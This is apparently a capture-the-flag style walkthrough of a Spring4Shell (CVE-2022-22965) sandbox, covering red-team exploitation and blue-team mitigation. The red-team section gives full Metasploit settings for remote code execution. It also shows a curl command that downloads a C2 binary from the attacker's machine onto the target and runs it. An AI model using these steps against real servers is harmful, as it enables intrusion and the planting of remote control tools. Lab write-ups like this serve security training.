Share
## https://sploitus.com/exploit?id=E3932EE9-E16C-54B3-901C-0E66AAF4B0BA
# Spring4Shell Threat Sandbox (CVE-2022-22965)

## Overview

This walkthrough documents the completion of the Sandbox Challenge focused on CVE-2022-22965, commonly known as Spring4Shell โ€” a critical (CVSS 9.8/10) remote code execution vulnerability affecting specific versions of the Spring Java framework. The challenge covers both offensive (red team) and defensive (blue team) perspectives of the vulnerability.

**Note:** Commands and file paths in this walkthrough reflect the specific environment used during this attempt. Your environment may differ โ€” adjust paths, IP addresses, and filenames accordingly.

---

## Environment

| Machine | IP Address | Role |
|---|---|---|
| Security-Desk (Kali Linux) | 172.16.200.12 | Attack and work machine |
| Red Target (Linux) | 172.16.100.90 | Exploitation target |
| Blue Target (Linux) | 172.16.100.100 | Hardening target |

**Credentials:** playerone / password123

---

## Red Team Objective: Deploy C2 Listener on Red Target

### Step 1 โ€” Identify the Target

Reviewed the Network Map tab in the challenge panel to confirm the Red Target IP (172.16.100.90). Used curl to inspect the web application running on port 80:

```bash
curl http://172.16.100.90
```

Output revealed Apache Tomcat 9.0.59 with a redirect to `/dasmsp`. Browsed the page source to identify a POST form endpoint at `/dasmsp/contact`.

### Step 2 โ€” Launch Metasploit and Configure the Exploit

```bash
msfconsole
```

```
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run
```

The exploit successfully generated a JSP shell, modified the class loader, flushed the log file, and opened a command shell session on the Red Target.

### Step 3 โ€” Obtain an Interactive Shell

After the session opened, entered `shell` to upgrade to an interactive shell. Metasploit located `/usr/bin/script` on the target and used it to pop an interactive shell as the `tomcat` user.

### Step 4 โ€” Transfer and Execute deploy_c2

The `deploy_c2` binary was located on the Security-Desk, not the Red Target. Hosted it via a Python3 HTTP server on the Security-Desk:

```bash
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080
```

Downloaded and executed it from within the Red Target shell session:

```bash
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2
```

Output confirmed: `Done!` โ€” C2 listener successfully deployed on the Red Target.

---

## Blue Team Objective: Mitigate CVE-2022-22965 on Blue Target (Downgrade to Java 8)

### Step 1 โ€” SSH into the Blue Target

From the Security-Desk terminal:

```bash
ssh playerone@172.16.100.100
```

Password: `password123`

### Step 2 โ€” Transfer Java 8 Packages to the Blue Target

The Java 8 `.deb` packages were located on the Security-Desk at `/home/playerone/Desktop/Resources/`. Transferred them to the Blue Target using SCP from a Security-Desk terminal:

```bash
scp /home/playerone/Desktop/Resources/*.deb playerone@172.16.100.100:/tmp/
```

Packages transferred:
- adoptium-ca-certificates_1.0.2-1_all.deb
- fonts-dejavu_2.37-6_all.deb
- p11-kit-modules_0.24.1-2_amd64.deb
- p11-kit_0.24.1-2_amd64.deb
- temurin-8-jdk_8.0.402.0.0+6_amd64.deb

### Step 3 โ€” Install Java 8 Packages

On the Blue Target SSH session:

```bash
sudo dpkg -i /tmp/*.deb
```

### Step 4 โ€” Set Java 8 as the Default (Known Issue Workaround)

Due to a known challenge issue, the check does not register correctly without manually setting Java 8 as the default:

```bash
sudo update-alternatives --config java
```

Selected option `2` โ€” `/usr/lib/jvm/temurin-8-jdk-amd64/bin/java`.

### Step 5 โ€” Update the Tomcat Service to Use Java 8

Inspected the Tomcat service unit file:

```bash
cat /etc/systemd/system/tomcat.service
```

Edited the file to update the JAVA_HOME environment variable:

```bash
sudo nano /etc/systemd/system/tomcat.service
```

Changed:
```
Environment="JAVA_HOME=/usr"
```
To:
```
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"
```

### Step 6 โ€” Reload and Restart Tomcat

```bash
sudo systemctl daemon-reload
sudo systemctl restart tomcat
```

The CVE-2022-22965 Mitigated on Blue Target check turned green in the challenge panel.

---

## Tools Used

- Metasploit Framework (`spring_framework_rce_spring4shell` module)
- curl
- Python3 HTTP Server
- SSH / SCP
- dpkg
- systemctl
- update-alternatives
- nano